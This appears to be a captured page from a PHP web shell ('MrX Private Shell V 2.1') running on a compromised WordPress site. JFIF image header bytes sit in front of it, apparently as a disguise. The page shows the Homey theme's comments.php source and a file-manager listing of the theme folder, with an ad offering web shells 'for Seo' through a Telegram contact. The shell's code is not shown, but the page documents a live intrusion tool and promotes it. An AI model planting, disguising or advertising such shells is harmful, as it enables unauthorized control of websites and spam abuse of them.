����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* The template for displaying Comments
*
* The area of the page that contains comments and the comment form.
*
* @package homey
* @since homey 1.0
*/
/*
* If the current post is protected by a password and the visitor has not yet
* entered the password we will return early without loading the comments.
*/
global $homey_local;
if ( post_password_required() ) {
return;
}
?>
<?php if ( have_comments() ) : ?>
<div class="blog-section block">
<div class="block-title">
<h3 class="title"><?php esc_html_e('Comments', 'homey'); ?></h3>
</div>
<ul class="comments-list list-unstyled">
<?php
wp_list_comments( array(
'style' => 'ul',
'short_ping' => true,
'avatar_size'=> 70,
'callback' => 'homey_comments_callback'
) );
?>
</ul>
</div>
<?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : ?>
<nav id="comment-nav-above" class="navigation comment-navigation" role="navigation">
<div class="nav-previous"><?php previous_comments_link( esc_html__( '← Older Comments', 'homey' ) ); ?></div>
<div class="nav-next"><?php next_comments_link( esc_html__( 'Newer Comments →', 'homey' ) ); ?></div>
</nav>
<?php endif; ?>
<?php endif; // have_comments() ?>
<?php if ( comments_open() ) : ?>
<div id="comments-form" class="blog-section block">
<div class="block-title">
<h3 class="title"><?php echo esc_attr($homey_local['join_discussion']); ?></h3>
</div>
<div class="comments-form block-body">
<?php
//Custom Fields
$fields = array(
'author'=> '<div class="row">
<div class="col-sm-6">
<div class="form-group">
<div class="input-user input-icon">
<input name="author" required class="form-control" id="author" value="" placeholder="'.esc_attr($homey_local['your_name']).'" type="text">
</div>
</div>
</div>',
'email' => '<div class="col-sm-6">
<div class="form-group">
<div class="input-email input-icon">
<input type="email" class="form-control" required name="email" id="email" placeholder="'.esc_attr($homey_local['your_email']).'">
</div>
</div>
</div>',
'url' => '</div>',
);
//Comment Form Args
$comments_args = array(
'fields' => $fields,
'title_reply'=> '',
'comment_notes_before' => '',
'comment_notes_after' => '',
'comment_field' => '<div class="row"><div class="col-sm-12"><div class="form-group"><textarea class="form-control" required rows="4" name="comment" placeholder="'.esc_attr($homey_local['your_comment']).'" id="comment"></textarea></div></div></div>',
'label_submit' => $homey_local['btn_post_comment']
);
// Show Comment Form
comment_form($comments_args);
?>
</div>
</div>
<?php endif; ?>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| css | Folder | 0755 |
|
|
| fonts | Folder | 0755 |
|
|
| framework | Folder | 0755 |
|
|
| images | Folder | 0755 |
|
|
| img | Folder | 0755 |
|
|
| inc | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| languages | Folder | 0755 |
|
|
| single-experience | Folder | 0755 |
|
|
| single-listing | Folder | 0755 |
|
|
| single-post | Folder | 0755 |
|
|
| template | Folder | 0755 |
|
|
| template-parts | Folder | 0755 |
|
|
| vc_templates | Folder | 0755 |
|
|
| woocommerce | Folder | 0755 |
|
|
| .DS_Store | File | 6 KB | 0644 |
|
| 404.php | File | 1.23 KB | 0644 |
|
| archive-experience.php | File | 4.34 KB | 0644 |
|
| archive-hm_homey_memberships.php | File | 2.05 KB | 0644 |
|
| archive-listing.php | File | 4.22 KB | 0644 |
|
| archive.php | File | 2.16 KB | 0644 |
|
| author.php | File | 369 B | 0644 |
|
| comments.php | File | 2.85 KB | 0644 |
|
| content-grid.php | File | 1.54 KB | 0644 |
|
| content-list.php | File | 899 B | 0644 |
|
| content-none.php | File | 1.39 KB | 0644 |
|
| content-page.php | File | 968 B | 0644 |
|
| content.php | File | 1.42 KB | 0644 |
|
| custom_periods_auto_renewl_for_next_year.php | File | 10.26 KB | 0644 |
|
| footer.php | File | 2.12 KB | 0644 |
|
| functions.php | File | 86.62 KB | 0644 |
|
| header.php | File | 5.38 KB | 0644 |
|
| index.php | File | 1.92 KB | 0644 |
|
| localization.php | File | 42.9 KB | 0644 |
|
| page.php | File | 2.64 KB | 0644 |
|
| screenshot.png | File | 282.37 KB | 0644 |
|
| search.php | File | 1.92 KB | 0644 |
|
| searchform.php | File | 320 B | 0644 |
|
| sidebar-experience.php | File | 654 B | 0644 |
|
| sidebar-listing.php | File | 640 B | 0644 |
|
| sidebar.php | File | 649 B | 0644 |
|
| single-experience.php | File | 2.21 KB | 0644 |
|
| single-hm_homey_memberships.php | File | 41.63 KB | 0644 |
|
| single-listing.php | File | 3.47 KB | 0644 |
|
| single.php | File | 5.63 KB | 0644 |
|
| style.css | File | 8.02 KB | 0644 |
|
| taxonomy-experience_amenity.php | File | 216 B | 0644 |
|
| taxonomy-experience_area.php | File | 209 B | 0644 |
|
| taxonomy-experience_city.php | File | 209 B | 0644 |
|
| taxonomy-experience_country.php | File | 209 B | 0644 |
|
| taxonomy-experience_facility.php | File | 209 B | 0644 |
|
| taxonomy-experience_language.php | File | 209 B | 0644 |
|
| taxonomy-experience_state.php | File | 209 B | 0644 |
|
| taxonomy-experience_type.php | File | 209 B | 0644 |
|
| taxonomy-listing_amenity.php | File | 215 B | 0644 |
|
| taxonomy-listing_area.php | File | 215 B | 0644 |
|
| taxonomy-listing_city.php | File | 215 B | 0644 |
|
| taxonomy-listing_country.php | File | 215 B | 0644 |
|
| taxonomy-listing_facility.php | File | 215 B | 0644 |
|
| taxonomy-listing_state.php | File | 215 B | 0644 |
|
| taxonomy-listing_type.php | File | 215 B | 0644 |
|
| taxonomy-room_type.php | File | 215 B | 0644 |
|
| wpml-config.xml | File | 15.61 KB | 0644 |
|